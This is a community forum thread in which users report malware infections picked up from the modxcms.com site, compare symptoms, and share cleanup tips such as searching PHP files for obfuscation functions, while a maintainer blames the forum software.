modxcms.com infected with malware?

Hello,

My pc was infected two times with malware (fake virus scanner and trojan) by visiting modxcms.com !
I guess the modx page is infected. I’m can’t say it 100% but I believe so.
I reformated my pc and opened firefox to visit modxcms.com and I was infected immediately again.

Then I was searching the web and I’m not alone:
http://webcache.googleusercontent.com/search?q=cache:8OTyr3N8gM8J:forums.malwarebytes.org/index.php%3Fshowtopic%3D71392+modxcms.com+malware&cd=3&hl=de&ct=clnk&gl=de&source=www.google.de

Please check this!
Thanks!

I can verify this.

Visiting http://modxcms.com/extras/package/?package=395 pops up an antivirus warning. Looking at the page source shows a suspicious script at the top of the page before the doctype:


Update: verified that this script prints out a script linked to a malicious website. don’t try this at home

This happened to me a couple of weeks ago as well. But at the time I didn’t believe it was the site.
Matt

I can’t find that script on that page. I’m confused! There was an instance months ago where something had been corrupted; could it possibly be cached in an ISP’s proxy?

I’m not getting it anymore either but I had seen the same behavior with my own site the was hacked a few months ago. The malware I encountered did some kind of browser and crawler detection to avoid getting the site flagged by google and used a combination of cookies and random numbers to decide if to put the script in the page. They are getting clever these days.

View your cookies for modxcms.com and see if there is one that starts with d41d8cd98f0... that would give you a good clue whether or not something is wrong.

I suggest you grep the sites php files for ’eval’ and ’base64_decode’ as those functions are usually used to hide the malware in your files.

@rthrash : When my colleague first went to the Extras site on an old PC and error messaage came up but it didn’t get infected. Not sure why, except that it’s a very old XP box. On a different, newer machine the malware was introduced.

I just checked and found that a cached version of the MODX page generated on the old machine was still available. I’ll PM you with a screenshot showing the message, which should be useful.

Command line wget, windows xp IE 6, and Mac OS X Safari do not see any of these document.write lines - PM the screenshot to me, if you could, and let me take a look.

Thanks!

- Kevin

@rthrash, kevin.marvin : Screenshot sent via email

This has happened to me twice in the past couple of weeks, the second time just last night. I googled "Modx random content" followed this link (http://modxcms.com/forums/index.php?topic=47341.0) through to the modx website, and was hit by the defender.exe malware!

*sigh* ... SMF ... this should be fixed again, and will be permanently so when we finally migrate off this forum software.